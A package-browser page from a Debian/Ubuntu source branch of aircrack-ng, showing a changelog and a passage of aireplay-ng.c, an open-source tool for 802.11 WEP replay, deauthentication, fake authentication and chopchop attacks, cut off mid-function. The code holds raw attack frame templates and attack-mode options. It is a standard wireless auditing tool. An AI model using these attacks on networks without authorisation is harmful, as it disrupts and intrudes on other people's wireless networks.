~ubuntu-branches/debian/sid/aircrack-ng/sid
» Revision
15
: .pc/020-ignore-negative-one.diff/src/aireplay-ng.c
« back to all changes in this revision
Viewing changes to .pc/020-ignore-negative-one.diff/src/aireplay-ng.c
- browse files at revision 15
- compare with another revision
- download diff
- download tarball
- view history from revision 15
- Committer: Package Import Robot
- Author(s): Carlos Alberto Lopez Perez
- Date: 2014-05-30 19:21:38 UTC
- mfrom: (1.2.5)
- Revision ID: package-import@ubuntu.com-20140530192138-0k5gmmyf1e4p7ihd
Tags: 1:1.2-0~beta3-1
* New upstream release.
* Remove all Debian patches that are now merged upstream.
* Apply: "wrap-and-sort -sa"
* Build with PCRE: Add support for regular expression matching for ESSID
in airodump-ng.
* Build with libgcrypt20 by default, but allow to use libgcrypt11 otherwise.
* Fix libnl detection (Debian patches 002-fix-libnl-detection.diff and
003-dont-abort-libnl-nolinux.diff).
* Add build dependency on libnl-genl-3-dev.
* Remove airdriver-ng (LP: #499513) (Closes: #449299).
* Not longer recommend wget, because we don't ship airdriver-ng neither
airoump-ng-oui-update.
* Recommend the Debian package ieee-data that contains the OUI data.
Add Debian patch 001-Airodump_whitespace_oui.diff to correctly parse it.
Not longer ship airodump-ng-oui-update (Use update-oui instead).
(Closes: #739199)
* Switch to debhelper 9 and enable all hardening flags (PIE works now).
* Update debian/watch and debian/copyright.
* Upgrade to new standards version.
* Remove all Debian patches that are now merged upstream.
* Apply: "wrap-and-sort -sa"
* Build with PCRE: Add support for regular expression matching for ESSID
in airodump-ng.
* Build with libgcrypt20 by default, but allow to use libgcrypt11 otherwise.
* Fix libnl detection (Debian patches 002-fix-libnl-detection.diff and
003-dont-abort-libnl-nolinux.diff).
* Add build dependency on libnl-genl-3-dev.
* Remove airdriver-ng (LP: #499513) (Closes: #449299).
* Not longer recommend wget, because we don't ship airdriver-ng neither
airoump-ng-oui-update.
* Recommend the Debian package ieee-data that contains the OUI data.
Add Debian patch 001-Airodump_whitespace_oui.diff to correctly parse it.
Not longer ship airodump-ng-oui-update (Use update-oui instead).
(Closes: #739199)
* Switch to debhelper 9 and enable all hardening flags (PIE works now).
* Update debian/watch and debian/copyright.
* Upgrade to new standards version.
- files added:
- .pc/001-Airodump_whitespace_oui.diff
- .pc/001-Airodump_whitespace_oui.diff/src
- .pc/002-fix-libnl-detection.diff
- .pc/003-dont-abort-libnl-nolinux.diff
- lib
- lib/csharp
- lib/csharp/Example1
- lib/csharp/Example1/Example1
- lib/csharp/Example1/Example1/Properties
- lib/csharp/MonoExample
- lib/csharp/MonoExample/NDesk-dbus
- lib/csharp/MonoExample/NewStationNotify
- lib/csharp/WirelessPanda
- lib/csharp/WirelessPanda/Properties
- lib/csharp/WirelessPanda/Readers
- scripts/airdrop-ng/airdrop
- scripts/airdrop-ng/doc
- scripts/airdrop-ng/old-installers
- scripts/airgraph-ng/graphviz
- scripts/airgraph-ng/support
- scripts/airoscript-ng
- scripts/airoscript-ng/Readme.rst
- scripts/airoscript-ng/doc
- scripts/airoscript-ng/doc/rst
- scripts/airoscript-ng/doc/rst/css
- scripts/airoscript-ng/doc/rst/images
- scripts/airoscript-ng/doc/rst/others
- scripts/airoscript-ng/src
- scripts/airoscript-ng/src/conf
- scripts/airoscript-ng/src/extras
- scripts/airoscript-ng/src/extras/completions
- scripts/airoscript-ng/src/functions
- scripts/airoscript-ng/src/functions/attacks
- scripts/airoscript-ng/src/functions/completions
- scripts/airoscript-ng/src/functions/crack
- scripts/airoscript-ng/src/functions/internal
- scripts/airoscript-ng/src/goodies
- scripts/airoscript-ng/src/locale
- scripts/airoscript-ng/src/locale/es_ES.UTF-8
- scripts/airoscript-ng/src/plugins
- scripts/airoscript-ng/src/templates
- scripts/airoscript-ng/src/themes
- scripts/versuck-ng
- files removed:
- .pc/002-Fix_airodump-ng_manpage.diff
- .pc/002-Fix_airodump-ng_manpage.diff/manpages
- .pc/003-fix-ftbfs-590765.diff
- .pc/003-fix-ftbfs-590765.diff/src
- .pc/003-fix-ftbfs-590765.diff/src/osdep
- .pc/004-fix-license-issues.diff
- .pc/004-fix-license-issues.diff/src
- .pc/005-fix-issues-cppcheck-r2008.diff
- .pc/005-fix-issues-cppcheck-r2008.diff/src
- .pc/006-fix-ftbfs-and-man-path.diff
- .pc/008-fix_path_airodump-ng-oui.diff
- .pc/008-fix_path_airodump-ng-oui.diff/scripts
- .pc/008-fix_path_airodump-ng-oui.diff/src
- .pc/009-airodump-ng-oui-update-manpage.diff
- .pc/009-airodump-ng-oui-update-manpage.diff/manpages
- .pc/010-add-freebsd-support.diff
- .pc/010-add-freebsd-support.diff/scripts
- .pc/010-add-freebsd-support.diff/src
- .pc/010-add-freebsd-support.diff/src/osdep
- .pc/011-add-support-for-gcrypt.diff
- .pc/011-add-support-for-gcrypt.diff/src
- .pc/012-add-unittest-gcrypt.diff
- .pc/012-add-unittest-gcrypt.diff/test
- .pc/012-add-unittest-gcrypt.diff/test/cryptounittest
- .pc/013-fix-hurd-ftbfs.diff
- .pc/013-fix-hurd-ftbfs.diff/src
- .pc/013-fix-hurd-ftbfs.diff/src/osdep
- .pc/014-man_page_formatting.diff
- .pc/014-man_page_formatting.diff/manpages
- .pc/015-move_to_man8_admin_commands.diff
- .pc/015-move_to_man8_admin_commands.diff/manpages
- .pc/016-fix-ldflags.diff
- .pc/016-fix-ldflags.diff/src
- .pc/017-fix-bigendianissues.diff
- .pc/017-fix-bigendianissues.diff/src
- .pc/018-workaround-681113-kfreebsd.diff
- .pc/018-workaround-681113-kfreebsd.diff/src
- .pc/019-fix-spelling-manpages.diff
- .pc/019-fix-spelling-manpages.diff/manpages
- .pc/020-ignore-negative-one.diff
- .pc/020-ignore-negative-one.diff/manpages
- .pc/020-ignore-negative-one.diff/src
- .pc/021-fix-airodump-ng-oui-update.diff
- .pc/021-fix-airodump-ng-oui-update.diff/scripts
- debian/airodump-ng-oui
- scripts/airdrop-ng/docs
- scripts/airdrop-ng/lib
- scripts/airdrop-ng/logs
- scripts/airdrop-ng/support
- files modified:
- .pc/000-Airmon_needs_bash.diff/scripts/airmon-ng
added
removed
.pc/020-ignore-negative-one.diff/src/aireplay-ng.c
1
/*
2
* 802.11 WEP replay & injection attacks
3
*
4
* Copyright (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
5
* Copyright (C) 2004, 2005 Christophe Devine
6
*
7
* WEP decryption attack (chopchop) developed by KoreK
8
*
9
* This program is free software; you can redistribute it and/or modify
10
* it under the terms of the GNU General Public License as published by
11
* the Free Software Foundation; either version 2 of the License, or
12
* (at your option) any later version.
13
*
14
* This program is distributed in the hope that it will be useful,
15
* but WITHOUT ANY WARRANTY; without even the implied warranty of
16
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17
* GNU General Public License for more details.
18
*
19
* You should have received a copy of the GNU General Public License
20
* along with this program; if not, write to the Free Software
21
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
22
*
23
*
24
* In addition, as a special exception, the copyright holders give
25
* permission to link the code of portions of this program with the
26
* OpenSSL library under certain conditions as described in each
27
* individual source file, and distribute linked combinations
28
* including the two.
29
* You must obey the GNU General Public License in all respects
30
* for all of the code used other than OpenSSL. * If you modify
31
* file(s) with this exception, you may extend this exception to your
32
* version of the file(s), but you are not obligated to do so. * If you
33
* do not wish to do so, delete this exception statement from your
34
* version. * If you delete this exception statement from all source
35
* files in the program, then also delete it here.
36
*/
37
38
#if defined(linux)
39
#include <linux/rtc.h>
40
#endif
41
42
#include <sys/types.h>
43
#include <sys/socket.h>
44
#include <sys/ioctl.h>
45
#include <sys/wait.h>
46
#include <sys/time.h>
47
48
#include <netinet/in.h>
49
#include <arpa/inet.h>
50
#include <unistd.h>
51
#include <dirent.h>
52
#include <signal.h>
53
#include <string.h>
54
#include <stdlib.h>
55
#include <stdio.h>
56
#include <errno.h>
57
#include <time.h>
58
#include <getopt.h>
59
60
#include <fcntl.h>
61
#include <ctype.h>
62
63
#include <limits.h>
64
65
#include <netinet/in_systm.h>
66
#include <netinet/ip.h>
67
#include <netinet/tcp.h>
68
69
#include "version.h"
70
#include "pcap.h"
71
#include "osdep/osdep.h"
72
#include "crypto.h"
73
#include "common.h"
74
75
#define RTC_RESOLUTION 8192
76
77
#define REQUESTS 30
78
#define MAX_APS 20
79
80
#define NEW_IV 1
81
#define RETRY 2
82
#define ABORT 3
83
84
#define DEAUTH_REQ \
85
"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
86
"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
87
88
#define AUTH_REQ \
89
"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
90
"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"
91
92
#define ASSOC_REQ \
93
"\x00\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
94
"\xBB\xBB\xBB\xBB\xBB\xBB\xC0\x00\x31\x04\x64\x00"
95
96
#define NULL_DATA \
97
"\x48\x01\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
98
"\xBB\xBB\xBB\xBB\xBB\xBB\xE0\x1B"
99
100
#define RTS \
101
"\xB4\x00\x4E\x04\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC"
102
103
#define RATES \
104
"\x01\x04\x02\x04\x0B\x16\x32\x08\x0C\x12\x18\x24\x30\x48\x60\x6C"
105
106
#define PROBE_REQ \
107
"\x40\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC" \
108
"\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00"
109
110
#define RATE_NUM 12
111
112
#define RATE_1M 1000000
113
#define RATE_2M 2000000
114
#define RATE_5_5M 5500000
115
#define RATE_11M 11000000
116
117
#define RATE_6M 6000000
118
#define RATE_9M 9000000
119
#define RATE_12M 12000000
120
#define RATE_18M 18000000
121
#define RATE_24M 24000000
122
#define RATE_36M 36000000
123
#define RATE_48M 48000000
124
#define RATE_54M 54000000
125
126
int bitrates[RATE_NUM]={RATE_1M, RATE_2M, RATE_5_5M, RATE_6M, RATE_9M, RATE_11M, RATE_12M, RATE_18M, RATE_24M, RATE_36M, RATE_48M, RATE_54M};
127
128
extern char * getVersion(char * progname, int maj, int min, int submin, int svnrev, int beta, int rc);
129
extern char * searchInside(const char * dir, const char * filename);
130
extern int maccmp(unsigned char *mac1, unsigned char *mac2);
131
extern unsigned char * getmac(char * macAddress, int strict, unsigned char * mac);
132
extern int check_crc_buf( unsigned char *buf, int len );
133
extern const unsigned long int crc_tbl[256];
134
extern const unsigned char crc_chop_tbl[256][4];
135
136
char usage[] =
137
138
"\n"
139
" %s - (C) 2006, 2007, 2008, 2009 Thomas d\'Otreppe\n"
140
" Original work: Christophe Devine\n"
141
" http://www.aircrack-ng.org\n"
142
"\n"
143
" usage: aireplay-ng <options> <replay interface>\n"
144
"\n"
145
" Filter options:\n"
146
"\n"
147
" -b bssid : MAC address, Access Point\n"
148
" -d dmac : MAC address, Destination\n"
149
" -s smac : MAC address, Source\n"
150
" -m len : minimum packet length\n"
151
" -n len : maximum packet length\n"
152
" -u type : frame control, type field\n"
153
" -v subt : frame control, subtype field\n"
154
" -t tods : frame control, To DS bit\n"
155
" -f fromds : frame control, From DS bit\n"
156
" -w iswep : frame control, WEP bit\n"
157
" -D : disable AP detection\n"
158
"\n"
159
" Replay options:\n"
160
"\n"
161
" -x nbpps : number of packets per second\n"
162
" -p fctrl : set frame control word (hex)\n"
163
" -a bssid : set Access Point MAC address\n"
164
" -c dmac : set Destination MAC address\n"
165
" -h smac : set Source MAC address\n"
166
" -g value : change ring buffer size (default: 8)\n"
167
" -F : choose first matching packet\n"
168
"\n"
169
" Fakeauth attack options:\n"
170
"\n"
171
" -e essid : set target AP SSID\n"
172
" -o npckts : number of packets per burst (0=auto, default: 1)\n"
173
" -q sec : seconds between keep-alives\n"
174
" -y prga : keystream for shared key auth\n"
175
" -T n : exit after retry fake auth request n time\n"
176
"\n"
177
" Arp Replay attack options:\n"
178
"\n"
179
" -j : inject FromDS packets\n"
180
"\n"
181
" Fragmentation attack options:\n"
182
"\n"
183
" -k IP : set destination IP in fragments\n"
184
" -l IP : set source IP in fragments\n"
185
"\n"
186
" Test attack options:\n"
187
"\n"
188
" -B : activates the bitrate test\n"
189
"\n"
190
/*
191
" WIDS evasion options:\n"
192
" -y value : Use packets older than n packets\n"
193
" -z : Ghosting\n"
194
"\n"
195
*/
196
" Source options:\n"
197
"\n"
198
" -i iface : capture packets from this interface\n"
199
" -r file : extract packets from this pcap file\n"
200
"\n"
201
" Miscellaneous options:\n"
202
"\n"
203
" -R : disable /dev/rtc usage\n"
204
"\n"
205
" Attack modes (numbers can still be used):\n"
206
"\n"
207
" --deauth count : deauthenticate 1 or all stations (-0)\n"
208
" --fakeauth delay : fake authentication with AP (-1)\n"
209
" --interactive : interactive frame selection (-2)\n"
210
" --arpreplay : standard ARP-request replay (-3)\n"
211
" --chopchop : decrypt/chopchop WEP packet (-4)\n"
212
" --fragment : generates valid keystream (-5)\n"
213
" --caffe-latte : query a client for new IVs (-6)\n"
214
" --cfrag : fragments against a client (-7)\n"
215
" --test : tests injection and quality (-9)\n"
216
"\n"
217
" --help : Displays this usage screen\n"
218
"\n";
219
220
221
struct options
222
{
223
unsigned char f_bssid[6];
224
unsigned char f_dmac[6];
225
unsigned char f_smac[6];
226
int f_minlen;
227
int f_maxlen;
228
int f_type;
229
int f_subtype;
230
int f_tods;
231
int f_fromds;
232
int f_iswep;
233
234
int r_nbpps;
235
int r_fctrl;
236
unsigned char r_bssid[6];
237
unsigned char r_dmac[6];
238
unsigned char r_smac[6];
239
unsigned char r_dip[4];
240
unsigned char r_sip[4];
241
char r_essid[33];
242
int r_fromdsinj;
243
char r_smac_set;
244
245
char ip_out[16]; //16 for 15 chars + \x00
246
char ip_in[16];
247
int port_out;
248
int port_in;
249
250
char *iface_out;
251
char *s_face;
252
char *s_file;
253
uchar *prga;
254
255
int a_mode;
256
int a_count;
257
int a_delay;
258
int f_retry;
259
260
int ringbuffer;
261
int ghost;
262
int prgalen;
263
264
int delay;
265
int npackets;
266
267
int fast;
268
int bittest;
269
270
int nodetect;
271
int rtc;
272
}
273
opt;
274
275
struct devices
276
{
277
int fd_in, arptype_in;
278
int fd_out, arptype_out;
279
int fd_rtc;
280
281
unsigned char mac_in[6];
282
unsigned char mac_out[6];
283
284
int is_wlanng;
285
int is_hostap;
286
int is_madwifi;
287
int is_madwifing;
288
int is_bcm43xx;
289
290
FILE *f_cap_in;
291
292
struct pcap_file_header pfh_in;
293
}
294
dev;
295
296
static struct wif *_wi_in, *_wi_out;
297
298
struct ARP_req
299
{
300
unsigned char *buf;
301
int hdrlen;
302
int len;
303
};
304
305
struct APt
306
{
307
unsigned char set;
308
unsigned char found;
309
unsigned char len;
310
unsigned char essid[255];
311
unsigned char bssid[6];
312
unsigned char chan;
313
unsigned int ping[REQUESTS];
314
int pwr[REQUESTS];
315
};
316
317
struct APt ap[MAX_APS];
318
319
unsigned long nb_pkt_sent;
320
unsigned char h80211[4096];
321
unsigned char tmpbuf[4096];
322
unsigned char srcbuf[4096];
323
char strbuf[512];
324
325
uchar ska_auth1[] = "\xb0\x00\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
326
"\x00\x00\x00\x00\x00\x00\xb0\x01\x01\x00\x01\x00\x00\x00";
327
328
uchar ska_auth3[4096] = "\xb0\x40\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
329
"\x00\x00\x00\x00\x00\x00\xc0\x01";
330
331
332
int ctrl_c, alarmed;
333
334
char * iwpriv;
335
336
337
void sighandler( int signum )
338
{
339
if( signum == SIGINT )
340
ctrl_c++;
341
342
if( signum == SIGALRM )
343
alarmed++;
344
}
345
346
int reset_ifaces()
347
{
348
//close interfaces
349
if(_wi_in != _wi_out)
350
{
351
if(_wi_in)
352
{
353
wi_close(_wi_in);
354
_wi_in = NULL;
355
}
356
if(_wi_out)
357
{
358
wi_close(_wi_out);
359
_wi_out = NULL;
360
}
361
}
362
else
363
{
364
if(_wi_out)
365
{
366
wi_close(_wi_out);
367
_wi_out = NULL;
368
_wi_in = NULL;
369
}
370
}
371
372
/* open the replay interface */
373
_wi_out = wi_open(opt.iface_out);
374
if (!_wi_out)
375
return 1;
376
dev.fd_out = wi_fd(_wi_out);
377
378
/* open the packet source */
379
if( opt.s_face != NULL )
380
{
381
_wi_in = wi_open(opt.s_face);
382
if (!_wi_in)
383
return 1;
384
dev.fd_in = wi_fd(_wi_in);
385
wi_get_mac(_wi_in, dev.mac_in);
386
}
387
else
388
{
389
_wi_in = _wi_out;
390
dev.fd_in = dev.fd_out;
391
392
/* XXX */
393
dev.arptype_in = dev.arptype_out;
394
wi_get_mac(_wi_in, dev.mac_in);
395
}
396
397
wi_get_mac(_wi_out, dev.mac_out);
398
399
return 0;
400
}
401
402
int set_bitrate(struct wif *wi, int rate)
403
{
404
int i, newrate;
405
406
if( wi_set_rate(wi, rate) )
407
return 1;
408
409
// if( reset_ifaces() )
410
// return 1;
411
412
//Workaround for buggy drivers (rt73) that do not accept 5.5M, but 5M instead
413
if (rate == 5500000 && wi_get_rate(wi) != 5500000) {
414
if( wi_set_rate(wi, 5000000) )
415
return 1;
416
}
417
418
newrate = wi_get_rate(wi);
419
for(i=0; i<RATE_NUM; i++)
420
{
421
if(bitrates[i] == rate)
422
break;
423
}
424
if(i==RATE_NUM)
425
i=-1;
426
if( newrate != rate )
427
{
428
if(i!=-1)
429
{
430
if( i>0 )
431
{
432
if(bitrates[i-1] >= newrate)
433
{
434
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
435
return 1;
436
}
437
}
438
if( i<RATE_NUM-1 )
439
{
440
if(bitrates[i+1] <= newrate)
441
{
442
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
443
return 1;
444
}
445
}
446
return 0;
447
}
448
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
449
return 1;
450
}
451
return 0;
452
}
453
454
int send_packet(void *buf, size_t count)
455
{
456
struct wif *wi = _wi_out; /* XXX globals suck */
457
unsigned char *pkt = (unsigned char*) buf;
458
459
if( (count > 24) && (pkt[1] & 0x04) == 0 && (pkt[22] & 0x0F) == 0)
460
{
461
pkt[22] = (nb_pkt_sent & 0x0000000F) << 4;
462
pkt[23] = (nb_pkt_sent & 0x00000FF0) >> 4;
463
}
464
465
if (wi_write(wi, buf, count, NULL) == -1) {
466
switch (errno) {
467
case EAGAIN:
468
case ENOBUFS:
469
usleep(10000);
470
return 0; /* XXX not sure I like this... -sorbo */
471
}
472
473
perror("wi_write()");
474
return -1;
475
}
476
477
nb_pkt_sent++;
478
return 0;
479
}
480
481
int read_packet(void *buf, size_t count, struct rx_info *ri)
482
{
483
struct wif *wi = _wi_in; /* XXX */
484
int rc;
485
486
rc = wi_read(wi, buf, count, ri);
487
if (rc == -1) {
488
switch (errno) {
489
case EAGAIN:
490
return 0;
491
}
492
493
perror("wi_read()");
494
return -1;
495
}
496
497
return rc;
498
}
499
500
void read_sleep( int usec )
501
{
502
struct timeval tv, tv2, tv3;
503
int caplen;
504
fd_set rfds;
505
506
gettimeofday(&tv, NULL);
507
gettimeofday(&tv2, NULL);
508
509
tv3.tv_sec=0;
510
tv3.tv_usec=10000;
511
512
while( ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) < (usec) )
513
{
514
FD_ZERO( &rfds );
515
FD_SET( dev.fd_in, &rfds );
516
517
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv3 ) < 0 )
518
{
519
continue;
520
}
521
522
if( FD_ISSET( dev.fd_in, &rfds ) )
523
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
524
525
gettimeofday(&tv2, NULL);
526
}
527
}
528
529
530
int filter_packet( unsigned char *h80211, int caplen )
531
{
532
int z, mi_b, mi_s, mi_d, ext=0, qos;
533
534
if(caplen <= 0)
535
return( 1 );
536
537
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
538
if ( ( h80211[0] & 0x80 ) == 0x80 )
539
{
540
qos = 1; /* 802.11e QoS */
541
z+=2;
542
}
543
544
if( (h80211[0] & 0x0C) == 0x08) //if data packet
545
ext = z-24; //how many bytes longer than default ieee80211 header
546
547
/* check length */
548
if( caplen-ext < opt.f_minlen ||
549
caplen-ext > opt.f_maxlen ) return( 1 );
550
551
/* check the frame control bytes */
552
553
if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
554
opt.f_type >= 0 ) return( 1 );
555
556
if( ( h80211[0] & 0x70 ) != (( opt.f_subtype << 4 ) & 0x70) && //ignore the leading bit (QoS)
557
opt.f_subtype >= 0 ) return( 1 );
558
559
if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
560
opt.f_tods >= 0 ) return( 1 );
561
562
if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
563
opt.f_fromds >= 0 ) return( 1 );
564
565
if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
566
opt.f_iswep >= 0 ) return( 1 );
567
568
/* check the extended IV (TKIP) flag */
569
570
if( opt.f_type == 2 && opt.f_iswep == 1 &&
571
( h80211[z + 3] & 0x20 ) != 0 ) return( 1 );
572
573
/* MAC address checking */
574
575
switch( h80211[1] & 3 )
576
{
577
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
578
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
579
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
580
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
581
}
582
583
if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
584
if( memcmp( h80211 + mi_b, opt.f_bssid, 6 ) != 0 )
585
return( 1 );
586
587
if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
588
if( memcmp( h80211 + mi_s, opt.f_smac, 6 ) != 0 )
589
return( 1 );
590
591
if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
592
if( memcmp( h80211 + mi_d, opt.f_dmac, 6 ) != 0 )
593
return( 1 );
594
595
/* this one looks good */
596
597
return( 0 );
598
}
599
600
int wait_for_beacon(uchar *bssid, uchar *capa, char *essid)
601
{
602
int len = 0, chan = 0, taglen = 0, tagtype = 0, pos = 0;
603
uchar pkt_sniff[4096];
604
struct timeval tv,tv2;
605
char essid2[33];
606
607
gettimeofday(&tv, NULL);
608
while (1)
609
{
610
len = 0;
611
while (len < 22)
612
{
613
len = read_packet(pkt_sniff, sizeof(pkt_sniff), NULL);
614
615
gettimeofday(&tv2, NULL);
616
if(((tv2.tv_sec-tv.tv_sec)*1000000) + (tv2.tv_usec-tv.tv_usec) > 10000*1000) //wait 10sec for beacon frame
617
{
618
return -1;
619
}
620
if(len <= 0) usleep(1);
621
}
622
if (! memcmp(pkt_sniff, "\x80", 1))
623
{
624
pos = 0;
625
taglen = 22; //initial value to get the fixed tags parsing started
626
taglen+= 12; //skip fixed tags in frames
627
do
628
{
629
pos += taglen + 2;
630
tagtype = pkt_sniff[pos];
631
taglen = pkt_sniff[pos+1];
632
} while(tagtype != 3 && pos < len-2);
633
634
if(tagtype != 3) continue;
635
if(taglen != 1) continue;
636
if(pos+2+taglen > len) continue;
637
638
chan = pkt_sniff[pos+2];
639
640
if(essid)
641
{
642
pos = 0;
643
taglen = 22; //initial value to get the fixed tags parsing started
644
taglen+= 12; //skip fixed tags in frames
645
do
646
{
647
pos += taglen + 2;
648
tagtype = pkt_sniff[pos];
649
taglen = pkt_sniff[pos+1];
650
} while(tagtype != 0 && pos < len-2);
651
652
if(tagtype != 0) continue;
653
if(taglen <= 1)
654
{
655
if (memcmp(bssid, pkt_sniff+10, 6) == 0) break;
656
else continue;
657
}
658
if(pos+2+taglen > len) continue;
659
660
if(taglen > 32)taglen = 32;
661
662
if((pkt_sniff+pos+2)[0] < 32 && memcmp(bssid, pkt_sniff+10, 6) == 0)
663
{
664
break;
665
}
666
667
/* if bssid is given, copy essid */
668
if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strlen(essid) == 0)
669
{
670
memset(essid, 0, 33);
671
memcpy(essid, pkt_sniff+pos+2, taglen);
672
break;
673
}
674
675
/* if essid is given, copy bssid AND essid, so we can handle case insensitive arguments */
676
if(bssid != NULL && memcmp(bssid, NULL_MAC, 6) == 0 && strncasecmp(essid, (char*)pkt_sniff+pos+2, taglen) == 0 && strlen(essid) == (unsigned)taglen)
677
{
678
memset(essid, 0, 33);
679
memcpy(essid, pkt_sniff+pos+2, taglen);
680
memcpy(bssid, pkt_sniff+10, 6);
681
printf("Found BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\" to given ESSID \"%s\".\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5], essid);
682
break;
683
}
684
685
/* if essid and bssid are given, check both */
686
if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strlen(essid) > 0)
687
{
688
memset(essid2, 0, 33);
689
memcpy(essid2, pkt_sniff+pos+2, taglen);
690
if(strncasecmp(essid, essid2, taglen) == 0 && strlen(essid) == (unsigned)taglen)
691
break;
692
else
693
{
694
printf("For the given BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\", there is an ESSID mismatch!\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5]);
695
printf("Found ESSID \"%s\" vs. specified ESSID \"%s\"\n", essid2, essid);
696
printf("Using the given one, double check it to be sure its correct!\n");
697
break;
698
}
699
}
700
}
701
}
702
}
703
704
if(capa) memcpy(capa, pkt_sniff+34, 2);
705
706
return chan;
707
}
708
709
/**
710
if bssid != NULL its looking for a beacon frame
711
*/
712
int attack_check(uchar* bssid, char* essid, uchar* capa, struct wif *wi)
713
{
714
int ap_chan=0, iface_chan=0;
715
716
iface_chan = wi_get_channel(wi);
717
718
if(bssid != NULL)
719
{
720
ap_chan = wait_for_beacon(bssid, capa, essid);
721
if(ap_chan < 0)
722
{
723
PCT; printf("No such BSSID available.\n");
724
return -1;
725
}
726
if(ap_chan != iface_chan)
727
{
728
PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_get_ifname(wi), iface_chan, ap_chan);
729
return -1;
730
}
731
}
732
733
return 0;
734
}
735
736
int getnet( uchar* capa, int filter, int force)
737
{
738
unsigned char *bssid;
739
740
if(opt.nodetect)
741
return 0;
742
743
if(filter)
744
bssid = opt.f_bssid;
745
else
746
bssid = opt.r_bssid;
747
748
749
if( memcmp(bssid, NULL_MAC, 6) )
750
{
751
PCT; printf("Waiting for beacon frame (BSSID: %02X:%02X:%02X:%02X:%02X:%02X) on channel %d\n",
752
bssid[0],bssid[1],bssid[2],bssid[3],bssid[4],bssid[5],wi_get_channel(_wi_in));
753
}
754
else if(strlen(opt.r_essid) > 0)
755
{
756
PCT; printf("Waiting for beacon frame (ESSID: %s) on channel %d\n", opt.r_essid,wi_get_channel(_wi_in));
757
}
758
else if(force)
759
{
760
PCT;
761
if(filter)
762
{
763
printf("Please specify at least a BSSID (-b) or an ESSID (-e)\n");
764
}
765
else
766
{
767
printf("Please specify at least a BSSID (-a) or an ESSID (-e)\n");
768
}
769
return( 1 );
770
}
771
else
772
return 0;
773
774
if( attack_check(bssid, opt.r_essid, capa, _wi_in) != 0)
775
{
776
if(memcmp(bssid, NULL_MAC, 6))
777
{
778
if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32)
779
{
780
printf( "Please specify an ESSID (-e).\n" );
781
}
782
}
783
784
if(!memcmp(bssid, NULL_MAC, 6))
785
{
786
if(strlen(opt.r_essid) > 0)
787
{
788
printf( "Please specify a BSSID (-a).\n" );
789
}
790
}
791
return( 1 );
792
}
793
794
return 0;
795
}
796
797
int xor_keystream(uchar *ph80211, uchar *keystream, int len)
798
{
799
int i=0;
800
801
for (i=0; i<len; i++) {
802
ph80211[i] = ph80211[i] ^ keystream[i];
803
}
804
805
return 0;
806
}
807
808
int capture_ask_packet( int *caplen, int just_grab )
809
{
810
time_t tr;
811
struct timeval tv;
812
struct tm *lt;
813
814
fd_set rfds;
815
long nb_pkt_read;
816
int i, j, n, mi_b=0, mi_s=0, mi_d=0, mi_t=0, mi_r=0, is_wds=0, key_index_offset;
817
int ret, z;
818
819
FILE *f_cap_out;
820
struct pcap_file_header pfh_out;
821
struct pcap_pkthdr pkh;
822
823
if( opt.f_minlen < 0 ) opt.f_minlen = 40;
824
if( opt.f_maxlen < 0 ) opt.f_maxlen = 1500;
825
if( opt.f_type < 0 ) opt.f_type = 2;
826
if( opt.f_subtype < 0 ) opt.f_subtype = 0;
827
if( opt.f_iswep < 0 ) opt.f_iswep = 1;
828
829
tr = time( NULL );
830
831
nb_pkt_read = 0;
832
833
signal( SIGINT, SIG_DFL );
834
835
while( 1 )
836
{
837
if( time( NULL ) - tr > 0 )
838
{
839
tr = time( NULL );
840
printf( "\rRead %ld packets...\r", nb_pkt_read );
841
fflush( stdout );
842
}
843
844
if( opt.s_file == NULL )
845
{
846
FD_ZERO( &rfds );
847
